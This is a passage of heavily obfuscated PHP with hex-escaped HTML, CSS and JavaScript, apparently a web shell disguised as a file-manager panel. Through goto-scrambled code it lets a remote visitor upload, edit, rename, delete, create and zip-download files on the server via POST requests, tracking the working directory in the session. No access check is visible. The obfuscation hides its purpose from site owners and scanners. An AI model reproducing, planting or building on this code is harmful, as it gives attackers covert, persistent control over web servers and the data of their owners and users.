20\62\x35\65\54\x20\62\x35\65\x2c\40\60\x2e\60\63\51\x3b\15\12\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x62\x6f\162\144\145\162\x3a\x20\61\x70\x78\40\x73\x6f\154\x69\144\x20\x72\147\x62\141\x28\x32\65\x35\54\40\62\65\x35\x2c\40\62\65\x35\54\40\x30\56\60\70\51\73\xd\12\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\40\142\x6f\x72\144\x65\162\55\x72\141\144\x69\165\x73\72\x20\x34\x70\x78\x3b\xd\12\x20\x20\40\x20\40\x20\40\x20\175\xd\xa\40\x20\40\x20\x20\40\x20\x20\15\xa\40\x20\x20\40\x20\x20\x20\x20\x2e\142\165\x6c\x6b\55\x61\x63\x74\151\157\156\x73\x2d\x74\x65\x78\164\40\x7b\15\xa\40\x20\40\40\40\40\x20\40\40\x20\40\x20\143\x6f\x6c\x6f\162\x3a\40\43\71\x63\x61\x33\x61\146\x3b\xd\12\40\40\x20\40\40\x20\x20\40\x20\40\40\40\x66\157\x6e\x74\x2d\163\151\x7a\x65\72\40\61\x33\160\170\73\xd\12\40\40\x20\40\40\40\40\40\x20\x20\40\40\155\141\x72\x67\151\156\x2d\x72\151\147\150\x74\72\40\x61\x75\x74\157\x3b\15\xa\x20\40\x20\40\40\x20\40\40\175\xd\12\x20\40\40\40\x20\x20\40\40\xd\12\40\40\40\x20\40\x20\x20\40\x69\x6e\x70\x75\164\x5b\164\171\160\145\75\x22\143\150\145\143\x6b\x62\157\170\42\135\x20\173\15\12\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\141\x70\160\145\x61\x72\141\x6e\x63\x65\72\40\156\157\156\145\73\xd\12\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\55\x77\145\142\x6b\x69\164\x2d\141\x70\160\x65\141\x72\x61\x6e\x63\x65\x3a\x20\156\x6f\x6e\x65\x3b\15\xa\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\167\151\x64\x74\x68\72\40\61\66\160\170\73\15\12\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\150\x65\151\x67\150\164\72\40\x31\66\x70\170\73\xd\12\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\x62\157\x72\144\x65\162\72\40\61\x70\x78\x20\163\157\154\151\x64\x20\162\147\142\x61\50\62\65\65\x2c\x20\x32\x35\65\54\40\x32\x35\x35\54\40\x30\56\x32\x29\73\xd\12\40\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x62\157\x72\x64\145\x72\55\x72\141\144\x69\x75\x73\x3a\40\x33\160\170\x3b\xd\xa\40\x20\40\40\40\40\40\x20\x20\40\40\40\x62\141\x63\153\147\x72\x6f\165\156\x64\72\x20\x72\x67\x62\x61\x28\x30\x2c\x20\60\x2c\40\60\54\x20\60\x2e\63\x29\73\xd\xa\40\40\40\x20\40\40\x20\x20\x20\40\40\x20\x63\165\x72\x73\157\162\x3a\x20\160\157\x69\156\x74\145\162\x3b\15\12\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\160\157\x73\151\x74\151\x6f\x6e\72\40\x72\145\x6c\x61\164\151\x76\x65\73\15\xa\40\x20\40\40\40\40\40\x20\x20\x20\40\x20\x74\162\x61\x6e\x73\x69\164\x69\157\x6e\x3a\x20\141\154\154\40\60\x2e\61\x35\x73\x20\145\141\x73\145\73\xd\xa\x20\x20\x20\40\x20\40\x20\x20\x7d\15\xa\x20\40\40\x20\x20\x20\x20\40\15\12\40\40\40\x20\x20\40\40\x20\x69\156\x70\x75\x74\x5b\x74\x79\160\145\75\42\x63\150\x65\143\x6b\142\x6f\170\42\135\72\x68\x6f\166\145\x72\40\173\xd\xa\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\142\157\x72\144\x65\162\x2d\x63\157\154\157\x72\72\x20\x72\147\x62\141\x28\62\x35\65\x2c\x20\x32\65\x35\54\40\62\x35\x35\x2c\40\x30\56\x33\x29\73\xd\xa\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\142\141\x63\x6b\x67\162\157\x75\x6e\x64\72\40\162\147\x62\141\x28\60\54\x20\x30\54\40\x30\x2c\x20\x30\56\x34\51\73\15\12\x20\x20\40\40\x20\40\x20\x20\175\15\12\x20\x20\x20\x20\x20\x20\40\40\xd\xa\40\40\x20\x20\x20\x20\x20\40\151\x6e\x70\x75\164\x5b\164\171\x70\x65\x3d\42\x63\150\x65\x63\x6b\x62\x6f\170\x22\135\x3a\x63\x68\145\143\x6b\145\x64\40\x7b\15\12\40\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\142\141\x63\x6b\147\162\x6f\165\x6e\144\x3a\40\x72\x67\x62\x61\50\63\64\54\40\x31\x39\67\x2c\40\x39\x34\54\x20\60\x2e\62\51\73\xd\xa\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20\x62\157\x72\144\x65\x72\55\x63\157\x6c\157\162\72\x20\43\62\x32\x63\x35\x35\x65\x3b\xd\xa\40\40\x20\x20\40\40\x20\x20\175\xd\12\40\x20\40\40\x20\40\40\x20\xd\xa\40\x20\x20\x20\40\40\40\40\x69\x6e\160\x75\164\133\164\171\160\145\75\42\143\x68\145\x63\x6b\x62\157\x78\x22\x5d\72\143\x68\x65\143\x6b\x65\x64\72\x3a\141\146\x74\145\162\40\173\15\xa\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\40\143\157\x6e\164\x65\x6e\164\72\40\x27\xe2\x9c\223\47\73\xd\xa\40\40\x20\40\40\x20\40\x20\40\x20\40\40\160\157\x73\x69\164\151\157\x6e\x3a\x20\141\142\x73\x6f\154\165\x74\x65\73\xd\12\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x74\157\160\72\40\x2d\x31\160\x78\73\xd\xa\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\154\145\x66\x74\x3a\x20\x32\x70\170\73\xd\12\40\x20\40\x20\40\x20\40\40\40\x20\40\x20\143\x6f\154\157\162\72\x20\x23\x32\62\143\x35\65\145\x3b\xd\xa\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\146\x6f\156\x74\55\x73\151\172\x65\72\40\x31\x32\x70\x78\73\xd\xa\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\146\157\x6e\164\55\167\x65\x69\147\150\x74\72\40\x62\x6f\x6c\144\73\15\12\40\40\x20\x20\40\40\40\x20\175\15\12\x20\x20\40\40\40\40\x20\x20\xd\12\40\40\40\x20\40\40\x20\x20\164\x68\x20\151\x6e\x70\x75\164\133\164\x79\160\145\x3d\42\x63\150\145\143\153\x62\x6f\x78\42\135\x20\x7b\15\xa\40\x20\40\40\x20\x20\40\40\40\x20\x20\x20\155\141\x72\x67\x69\x6e\72\x20\60\x3b\15\12\40\40\x20\x20\40\40\40\x20\175\15\xa\40\x20\40\40\40\40\40\40\xd\xa\40\40\40\40\x20\x20\x20\x20\x74\144\40\x69\x6e\160\x75\164\133\164\x79\x70\145\75\x22\x63\x68\145\143\153\142\x6f\x78\42\135\x20\x7b\15\12\40\x20\40\40\x20\40\x20\40\x20\40\40\40\x6d\141\162\147\151\156\x2d\x72\151\x67\x68\164\x3a\40\70\x70\170\73\xd\xa\40\x20\40\40\x20\40\x20\40\x7d\xd\xa\40\x20\40\x20\40\x20\x20\x20\15\12\x20\40\40\40\x20\x20\40\x20\56\x75\x70\x6c\157\x61\144\55\164\x61\x62\x73\40\x7b\15\12\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\x64\151\x73\160\154\x61\171\x3a\40\146\154\x65\x78\73\xd\12\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x6d\141\162\x67\151\x6e\x2d\x62\157\164\164\157\x6d\72\x20\x31\x30\x70\170\x3b\15\xa\40\40\40\x20\40\x20\40\x20\x20\x20\x20\40\142\x6f\162\144\145\x72\55\x62\157\164\x74\157\x6d\x3a\x20\61\160\x78\x20\x73\157\x6c\x69\x64\40\162\x67\142\x61\x28\x32\x35\65\54\40\x32\x35\x35\54\x20\x32\65\x35\x2c\40\60\x2e\61\x29\x3b\xd\xa\x20\40\x20\40\x20\x20\x20\40\175\xd\12\40\40\40\x20\x20\40\40\x20\xd\12\40\40\40\40\x20\x20\x20\40\56\x75\160\154\x6f\141\x64\55\164\x61\x62\x20\173\15\xa\x20\40\40\40\40\x20\40\x20\x20\40\40\40\x70\x61\x64\144\x69\x6e\x67\x3a\x20\70\x70\170\x20\x31\62\x70\170\73\15\12\x20\x20\x20\x20\40\x20\x20\40\40\40\40\40\143\165\162\163\157\x72\x3a\x20\160\x6f\151\x6e\164\145\162\73\xd\xa\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\x62\x6f\162\144\145\162\55\x62\157\x74\164\157\x6d\72\40\x32\x70\x78\x20\x73\157\x6c\151\144\x20\x74\162\x61\156\x73\x70\141\162\x65\156\x74\x3b\15\xa\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x74\x72\141\x6e\x73\151\x74\x69\157\156\x3a\x20\141\x6c\x6c\40\x30\56\62\x73\73\15\xa\x20\40\40\40\x20\x20\40\40\x7d\xd\12\40\x20\40\x20\40\x20\40\x20\xd\12\x20\40\40\40\x20\x20\x20\40\x2e\165\160\x6c\x6f\141\144\x2d\164\x61\x62\56\141\x63\164\151\x76\145\40\173\15\xa\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\x62\157\162\144\x65\162\x2d\142\x6f\164\x74\x6f\x6d\55\143\157\154\157\162\72\x20\x23\62\x32\143\65\x35\145\x3b\15\12\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\143\157\x6c\157\x72\72\40\43\x32\62\x63\x35\65\145\73\xd\12\40\x20\x20\40\x20\40\x20\40\x7d\xd\12\x20\x20\40\x20\x20\40\40\40\xd\12\x20\40\x20\x20\40\40\x20\x20\56\165\x70\x6c\x6f\x61\x64\x2d\164\141\x62\72\x68\157\166\145\x72\x20\x7b\xd\xa\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\143\157\154\157\x72\72\40\x23\145\x34\x65\x36\145\x62\73\15\12\40\40\40\x20\40\40\x20\x20\x7d\15\xa\x20\40\x20\40\40\40\40\40\15\12\40\40\x20\40\40\40\x20\x20\56\165\160\154\157\x61\144\55\x70\x61\x6e\x65\154\40\173\xd\12\40\x20\40\x20\40\40\40\40\x20\40\x20\x20\144\x69\x73\160\x6c\x61\171\x3a\40\x6e\157\x6e\x65\73\xd\xa\x20\x20\x20\x20\x20\40\x20\x20\175\15\xa\40\x20\40\x20\40\x20\40\40\xd\12\x20\40\x20\40\x20\x20\40\40\56\x75\x70\x6c\157\141\x64\55\160\x61\x6e\145\x6c\x2e\x61\143\x74\151\166\x65\40\173\15\12\40\x20\x20\x20\40\40\x20\40\40\x20\40\x20\x64\x69\163\160\x6c\x61\x79\72\40\x62\x6c\157\143\x6b\x3b\15\12\40\x20\40\x20\40\40\40\x20\175\xd\12\40\40\40\40\74\x2f\x73\164\x79\x6c\x65\x3e\15\xa\40\x20\x20\40\74\x73\143\162\x69\x70\164\76\xd\12\40\x20\40\40\x20\40\x20\x20\146\x75\x6e\143\x74\x69\157\156\40\x74\157\147\x67\x6c\x65\123\145\x6c\145\143\x74\101\x6c\154\50\143\x68\145\x63\153\x62\157\x78\51\40\173\15\xa\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\143\157\156\163\164\x20\x63\x68\x65\x63\x6b\x62\157\x78\x65\x73\40\x3d\x20\x64\157\143\x75\x6d\x65\x6e\164\x2e\x71\165\145\162\x79\x53\145\154\x65\x63\164\x6f\x72\x41\x6c\x6c\50\47\151\156\160\165\164\x5b\156\x61\x6d\145\x3d\x22\163\145\x6c\x65\143\164\x65\144\x5f\x69\164\x65\x6d\x73\133\135\42\135\47\51\x3b\xd\12\40\40\40\40\x20\40\40\x20\40\40\x20\40\143\150\x65\x63\153\142\157\170\x65\163\56\146\157\162\x45\141\143\150\50\x63\142\40\x3d\x3e\40\x63\x62\56\143\150\x65\x63\153\145\x64\40\x3d\x20\143\x68\145\143\153\142\x6f\170\x2e\143\150\x65\143\x6b\145\x64\51\73\15\xa\40\40\40\40\40\40\x20\40\40\40\40\x20\165\x70\144\141\x74\145\x42\x75\x6c\153\101\x63\x74\x69\x6f\156\x73\x28\x29\x3b\15\xa\40\x20\x20\40\40\40\x20\40\x7d\xd\12\40\40\40\40\x20\x20\x20\x20\xd\12\x20\40\x20\40\x20\40\40\40\146\x75\x6e\143\x74\151\157\156\x20\165\160\144\141\164\145\x42\165\x6c\153\x41\143\164\151\x6f\x6e\163\50\x29\40\x7b\15\xa\x20\x20\40\x20\x20\40\40\40\x20\x20\40\40\x63\x6f\x6e\x73\164\40\x63\150\145\x63\x6b\142\x6f\x78\x65\163\x20\x3d\x20\x64\x6f\143\x75\155\x65\x6e\164\56\161\165\x65\162\x79\x53\145\x6c\x65\143\x74\157\162\101\x6c\x6c\50\x27\x69\156\160\x75\x74\133\x6e\x61\155\145\x3d\x22\x73\x65\x6c\145\x63\x74\145\x64\137\x69\x74\x65\155\163\133\x5d\42\x5d\x3a\x63\150\145\x63\153\x65\144\x27\x29\73\xd\xa\40\40\x20\x20\40\40\x20\x20\40\40\x20\40\x63\x6f\x6e\x73\164\x20\142\x75\x6c\153\101\x63\164\x69\x6f\x6e\163\x20\75\x20\x64\157\143\165\x6d\145\x6e\x74\56\147\x65\164\105\x6c\x65\x6d\x65\x6e\x74\102\x79\x49\144\x28\47\x62\x75\x6c\153\x2d\141\143\x74\x69\x6f\156\163\x27\x29\73\15\xa\x20\40\40\x20\40\40\40\x20\x20\x20\x20\x20\143\157\156\163\164\40\x63\157\x75\156\164\124\x65\x78\x74\40\x3d\x20\x64\157\143\x75\x6d\x65\156\164\x2e\147\145\x74\105\154\145\155\145\x6e\x74\x42\171\111\144\50\47\x73\x65\154\x65\143\164\x65\x64\x2d\x63\x6f\165\156\164\47\51\x3b\15\12\40\x20\40\40\40\x20\40\40\x20\40\40\40\xd\12\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x69\x66\x20\50\x63\150\145\143\153\x62\x6f\x78\145\163\x2e\x6c\145\x6e\x67\164\150\40\76\40\x30\x29\x20\173\xd\xa\40\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x62\165\154\153\101\x63\164\x69\157\x6e\163\x2e\x73\x74\x79\154\145\x2e\144\151\163\160\154\x61\x79\40\x3d\40\47\146\x6c\x65\170\47\73\xd\xa\40\40\40\40\40\x20\40\40\x20\40\x20\40\x20\40\40\x20\143\x6f\x75\156\164\124\x65\170\164\56\x74\145\170\164\x43\157\x6e\164\145\156\164\x20\x3d\x20\x63\150\x65\143\153\142\157\x78\x65\x73\x2e\154\x65\x6e\147\164\x68\x20\x2b\40\x27\x20\x69\x74\145\155\x28\x73\51\40\x73\145\154\x65\143\x74\x65\x64\47\73\xd\12\40\40\40\40\40\40\40\40\40\40\40\x20\x7d\x20\145\154\x73\x65\x20\173\15\12\40\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x62\165\x6c\153\x41\143\x74\x69\157\x6e\163\56\163\164\171\x6c\145\56\x64\x69\x73\x70\154\141\171\40\75\x20\x27\156\x6f\156\x65\x27\x3b\xd\12\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\175\15\xa\x20\40\40\x20\40\x20\x20\x20\x7d\xd\12\40\40\x20\40\x20\x20\40\40\15\xa\40\x20\x20\x20\x20\40\x20\40\146\x75\x6e\x63\x74\151\x6f\x6e\x20\163\167\151\x74\143\150\125\160\x6c\x6f\141\144\124\x61\142\x28\164\141\x62\111\x64\x29\x20\173\15\12\40\x20\40\x20\40\40\40\x20\x20\40\40\x20\x2f\57\x20\x48\x69\144\x65\x20\x61\x6c\154\x20\x70\141\156\145\154\x73\15\xa\40\40\x20\x20\40\40\40\x20\x20\40\40\40\144\157\143\165\x6d\x65\156\164\56\161\x75\x65\x72\x79\123\145\x6c\x65\143\164\157\162\x41\154\x6c\50\x27\56\x75\160\154\157\x61\x64\55\x70\x61\156\145\x6c\47\51\x2e\x66\157\162\105\x61\x63\150\x28\x70\x61\x6e\x65\x6c\40\75\76\40\x7b\xd\xa\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\160\x61\156\x65\154\56\143\154\141\163\163\x4c\151\163\x74\x2e\x72\x65\155\157\x76\x65\50\x27\141\143\164\151\x76\x65\47\x29\73\15\12\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\175\x29\x3b\15\xa\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\xd\12\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x2f\57\x20\122\x65\x6d\x6f\166\145\40\x61\x63\164\x69\166\145\40\x63\x6c\x61\163\x73\x20\x66\x72\157\155\40\141\154\x6c\x20\164\141\x62\x73\15\xa\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\144\157\x63\165\x6d\145\x6e\164\x2e\161\x75\145\x72\171\x53\145\154\x65\143\x74\157\x72\101\154\x6c\50\x27\56\x75\x70\154\x6f\141\x64\x2d\x74\141\142\47\x29\x2e\x66\x6f\162\105\141\x63\150\x28\x74\141\142\x20\x3d\76\40\173\15\xa\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\40\40\x20\164\141\142\x2e\x63\x6c\141\163\x73\x4c\x69\x73\x74\x2e\162\145\155\x6f\x76\x65\50\47\141\143\x74\x69\x76\x65\x27\x29\73\15\xa\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x7d\x29\x3b\15\xa\x20\40\x20\x20\40\40\40\40\x20\x20\40\40\xd\xa\x20\40\x20\x20\40\40\40\x20\40\40\40\40\x2f\57\x20\x53\150\157\x77\40\x73\x65\154\145\143\164\145\144\x20\160\x61\156\x65\x6c\xd\12\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\144\x6f\x63\165\155\145\156\x74\x2e\147\145\x74\105\x6c\145\x6d\145\156\164\x42\x79\111\x64\50\164\141\x62\x49\144\40\53\40\x27\x2d\x70\141\156\145\x6c\47\x29\56\143\x6c\x61\163\163\114\151\163\x74\x2e\141\x64\144\x28\47\141\143\164\151\166\x65\47\x29\x3b\15\xa\x20\40\40\40\40\x20\x20\40\40\40\40\40\xd\12\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\57\57\40\101\x64\144\x20\x61\x63\164\151\166\145\x20\143\x6c\141\x73\163\40\164\157\x20\163\145\x6c\145\x63\x74\x65\144\x20\164\141\x62\15\xa\x20\40\x20\40\40\40\x20\x20\40\40\x20\40\144\157\x63\x75\x6d\145\156\x74\x2e\147\x65\x74\x45\x6c\x65\155\145\x6e\x74\102\171\111\144\50\x74\141\142\x49\144\x20\x2b\40\x27\x2d\x74\x61\142\47\x29\x2e\143\154\141\163\163\x4c\x69\x73\x74\56\x61\144\x64\x28\47\x61\x63\164\151\x76\x65\47\x29\73\xd\12\40\x20\x20\40\40\x20\x20\40\175\15\xa\x20\x20\40\x20\x20\40\40\40\15\12\40\x20\40\x20\40\40\40\x20\146\x75\156\x63\x74\x69\x6f\x6e\x20\x75\x70\x6c\157\x61\x64\x46\151\x6c\145\50\x29\x20\173\xd\12\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\166\141\x72\x20\146\x69\154\x65\111\x6e\160\165\164\x20\x3d\x20\144\x6f\143\x75\x6d\x65\156\x74\x2e\147\145\x74\x45\x6c\145\155\x65\x6e\164\x42\x79\111\x64\50\x27\165\x70\154\x6f\x61\x64\137\146\151\x6c\145\163\x27\x29\x3b\xd\12\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x76\x61\162\x20\163\x74\x61\164\165\163\123\160\x61\156\x20\75\40\x64\x6f\143\x75\155\145\156\x74\x2e\147\x65\x74\x45\154\x65\x6d\145\x6e\164\x42\x79\x49\144\50\x27\x75\160\154\157\x61\144\x5f\163\164\x61\164\x75\163\x27\51\x3b\xd\12\40\40\40\x20\40\40\x20\x20\40\x20\x20\x20\15\xa\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x69\x66\40\x28\41\146\151\154\x65\111\x6e\160\165\x74\x2e\146\151\154\x65\163\x20\x7c\174\x20\x66\151\x6c\x65\x49\x6e\160\x75\x74\56\x66\151\x6c\x65\163\56\x6c\145\x6e\x67\x74\150\40\75\x3d\75\x20\x30\x29\40\x7b\15\xa\40\x20\40\40\x20\40\40\40\40\40\40\40\x20\40\40\40\163\164\141\164\x75\x73\x53\x70\x61\156\56\x74\x65\x78\164\103\157\x6e\164\145\x6e\164\x20\75\x20\x22\x4e\157\40\x66\151\x6c\145\x20\x73\145\x6c\x65\143\164\145\x64\x22\73\15\12\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\x73\x74\x61\164\165\163\x53\x70\141\x6e\x2e\163\x74\171\x6c\145\56\143\157\154\x6f\x72\x20\x3d\x20\42\162\x65\144\x22\x3b\xd\12\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\40\40\40\x72\145\x74\165\x72\156\x3b\15\xa\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\175\xd\xa\40\40\40\40\x20\40\x20\x20\x20\x20\40\40\xd\xa\40\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x76\141\x72\x20\146\151\x6c\145\40\75\x20\x66\151\154\145\111\x6e\x70\x75\x74\56\146\151\x6c\145\x73\133\x30\x5d\73\15\12\40\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\166\141\x72\40\x66\x69\x6c\x65\x6e\141\155\145\x20\75\x20\146\151\x6c\x65\56\x6e\x61\155\145\x3b\xd\xa\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x76\x61\162\40\x63\x75\x72\x72\145\156\x74\x44\x69\162\x20\75\40\x22"; goto TiYuu; YfOac: n3o0m: goto zthCK; r4saX: UHEbr: goto c0wwU; oo5fC: CMlC2: goto qn0Tp; HtfNf: if (!(!isset($_SESSION["\x63\165\x72\x72\x65\156\x74\137\x64\x69\162"]) || !is_dir($_SESSION["\143\165\162\162\x65\156\x74\x5f\144\151\x72"]))) { goto boaWi; } goto jKlB8; lsHmc: function O6VeI($LfBoR) { goto Lp12M; v311a: kzGfn: goto AO8UQ; KaI7Z: if (!($c5Wqf && (is_file($c5Wqf) || is_dir($c5Wqf)))) { goto kzGfn; } goto WLZI5; AO8UQ: return false; goto CEUns; Lp12M: $c5Wqf = realpath($LfBoR); goto KaI7Z; WLZI5: return $c5Wqf; goto v311a; CEUns: } goto AThqA; n9NaO: if ($g5ZYS && $onaac) { goto Zm0of; } goto adyWM; QW5Y8: echo "\74\x2f\x74\x65\170\x74\x61\162\145\141\x3e\xd\xa\x20\x20\x20\x20\40\40\x20\x20\74\57\x64\x69\x76\76\xd\xa\40\40\40\x20"; goto bGPe1; VmHpR: $uzhX9 = "\x52\x65\156\x61\x6d\x65\40\x66\x61\x69\154\x65\x64\72\40\x50\x65\162\155\151\163\163\151\157\156\x20\x64\x65\x6e\x69\145\x64\x20\157\162\40\151\x6e\x76\x61\x6c\x69\x64\x20\x6e\141\x6d\x65"; goto F8WQW; Q8kPn: WVpor: goto k_zZe; NofKf: if (!($dOeky !== null)) { goto UHEbr; } goto yX9np; sS0v1: goto wllDN; goto mErIG; k3682: MAE99: goto pk3WM; eYJkm: if (!isset($_POST["\x64\157\167\156\x6c\157\x61\x64"])) { goto MD3DY; } goto zI48p; j4aOz: goto l8ZKi; goto mRtkK; a_IMi: $qftpV = o6vEI($_SESSION["\143\165\x72\x72\145\156\164\137\144\x69\x72"] . DIRECTORY_SEPARATOR . $_POST["\x66\x69\x6c\x65\137\x74\157\137\x65\x64\151\164"]); goto CkPd3; kMtyj: h5PJI: goto QqulX; bwG06: EMQGQ: goto rDLiH; yMj3q: goto EaZIY; goto oo5fC; FMgJE: if (move_uploaded_file($_FILES["\x66\151\154\145\137\165\160\x6c\x6f\141\x64"]["\164\x6d\160\x5f\x6e\141\155\x65"], $HsbRa)) { goto d_jag; } goto ZPPB1; FSiKH: $tDWqL = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $i2cFz; goto YFC2b; N72Pp: $uzhX9 = "\x45\144\x69\164\40\x66\x61\151\x6c\x65\144\x3a\x20\106\x69\x6c\145\x20\156\x6f\164\x20\167\x72\x69\x74\x61\142\154\x65"; goto mgbXN; dYpSD: sWKDG: goto dvGga; DtLHW: Mk1MG: goto u5FoX; F8WQW: goto U96_Q; goto Fo25L; FuesT: $YKJaG = "\x46\x69\154\145\40\165\x70\154\x6f\x61\144\145\144\40\163\x75\143\x63\145\163\163\146\165\154\154\171"; goto uSkjR; WNywB: goto R1ixt; goto rz0hC; oIV2o: EaZIY: goto hp5FQ; j36Ps: goto zW1aI; goto FHYHb; r9Zuw: TbLVs: goto ntiGN; Kj8lM: sort($jzhHU); goto Na3VW; bOYb7: if ($x0vZt === false) { goto gNbPq; } goto q1BhG; Pje6A: exit; goto b1uPF; V8W0Y: Bem6d: goto lsHmc; EGPgq: gNbPq: goto XZP6J; rX96z: uyt4Y: goto i_z64; aEqhM: echo htmlentities($Q2jV2); goto MkV3v; lnrl_: if (!(isset($_POST["\x63\x72\145\141\164\145\137\146\151\154\x65"]) && trim($_POST["\x63\x72\145\141\164\x65\x5f\x66\x69\x6c\x65"]) !== '')) { goto b823h; } goto i8Gov; bGPe1: mPBBQ: goto ZpxVy; LS1rj: goto wllDN; goto EGPgq; OX7Zf: if (is_file($x0vZt)) { goto WVpor; } goto H4tjj; LZmjk: if (!is_writable($qftpV)) { goto qyxzL; } goto BE4J9; g5B9O: goto l8ZKi; goto SnOAb; JXc1i: goto F4fiN; goto YVmVL; mRtkK: EofqJ: goto HPZuV; giGq4: goto zW1aI; goto T5ppl; ZPPB1: $uzhX9 = "\125\160\x6c\157\141\x64\x20\x66\141\151\154\x65\x64\72\x20\x43\x6f\165\154\144\40\x6e\157\x74\x20\155\x6f\x76\x65\40\x66\x69\154\x65\x2e\40\103\x68\x65\143\153\x20\144\151\162\x65\x63\164\157\x72\x79\40\160\x65\x72\155\151\x73\163\151\157\156\163\56"; goto giGq4; jbFRS: Z9PPO: goto rAGI0; e0F9Y: if (!(isset($_FILES["\146\x69\x6c\x65\x5f\165\x70\x6c\157\x61\x64"]) && $_FILES["\x66\151\x6c\145\137\x75\160\x6c\157\x61\144"]["\145\x72\162\157\162"] !== UPLOAD_ERR_NO_FILE)) { goto bVxXX; } goto VIATB; AThqA: function EyrCA($vnaAy) { goto PQzdo; EWarQ: OKgwX: goto zd9sd; DJ2Hy: if (!(empty($vnaAy) || $vnaAy === "\56" || $vnaAy === "\x2e\56")) { goto OKgwX; } goto OoztS; OoztS: return false; goto EWarQ; zd9sd: return $vnaAy; goto rI9ma; AGoKl: $vnaAy = preg_replace("\x2f\x5b\x5e\x61\55\x7a\101\55\132\x30\x2d\x39\56\x5f\x2d\x5d\57", "\x5f", $vnaAy); goto DJ2Hy; PQzdo: $vnaAy = basename($vnaAy); goto AGoKl; rI9ma: } goto czYE2; Aiwax: $dOeky = $_POST["\145\144\x69\x74"] ?? null; goto QExZX; OP8vV: if (is_dir($x0vZt)) { goto Oor6f; } goto LS1rj; EAQvq: if (class_exists("\x5a\151\160\x41\162\143\150\151\x76\145")) { goto uiEWB; } goto YXUmT; wqFtA: $QTgbB = 0; goto Vtcwp; jMgd3: if (file_exists($SLAxm)) { goto YsLZC; } goto fGudz; XD4g1: $uzhX9 = "\102\165\x6c\153\x20\144\157\x77\156\154\x6f\141\144\40\146\x61\x69\x6c\x65\144\72\x20\132\x69\x70\101\162\x63\150\x69\x76\x65\x20\x6e\x6f\164\x20\141\166\141\x69\154\141\142\154\x65"; goto R7Z0O; Ray9n: exit; goto bfmDz; uXjP6: if (!($ZTqqh > 0)) { goto AyvEs; } goto OjlkC; CGKu1: echo htmlentities($YKJaG); goto tWBhg; FfvL_: $QlLsI = $dOeky ? @file_get_contents($Q2jV2 . "\x2f" . $dOeky) : null; goto cmqOg; QExZX: $VW3Pb = $_POST["\166\x69\x65\167"] ?? null; goto PEzLd; yTE4L: fwrite($onaac, $rVqjv); goto DkiId; DRiN5: goto U96_Q; goto dYpSD; PRG6m: echo dirname($Q2jV2); goto uwqpy; aVJhv: readfile($tDWqL); goto YYsUM; qmIsU: iTgGv: goto XlBi3; an71K: foreach ($DES8d as $zNRKh) { goto iSSAt; bQTYE: kd4kL: goto ojyyO; KGmWs: Y0qmB: goto wsu6G; npRfR: goto Y0qmB; goto bQTYE; kToln: $D1TWc->addFile($idnI2, $Sn_2U); goto npRfR; wsu6G: EyVan: goto qDE3E; ojyyO: $D1TWc->addEmptyDir($Sn_2U); goto KGmWs; ZpkFN: $Sn_2U = substr($idnI2, strlen($x0vZt) + 1); goto U3zTb; U3zTb: if ($zNRKh->isDir()) { goto kd4kL; } goto kToln; iSSAt: $idnI2 = $zNRKh->getRealPath(); goto ZpkFN; qDE3E: } goto Df_10; RIugT: if (!isset($_POST["\x72\x65\155\x6f\x76\145"])) { goto uyt4Y; } goto N1t8E; kJtJr: $v91o9 = eyRCa($_POST["\x63\x72\145\141\164\145\x5f\146\x6f\154\144\x65\x72"]); goto HYlGl; Kk3RZ: fzbpc: goto OaxkT; lPbaI: if ($r20dt === false) { goto uN54I; } goto UllbL; KQSyI: if (class_exists("\x5a\151\160\101\x72\x63\x68\151\166\145")) { goto TbLVs; } goto XD4g1; xWU67: echo htmlentities($dOeky); goto kbjH0; yFdKQ: IjDPn: goto rX96z; GrtIs: if (!($VW3Pb && $OIEuk !== null)) { goto mPBBQ; } goto i62sv; UH5AZ: h1kgm: goto iofzz; 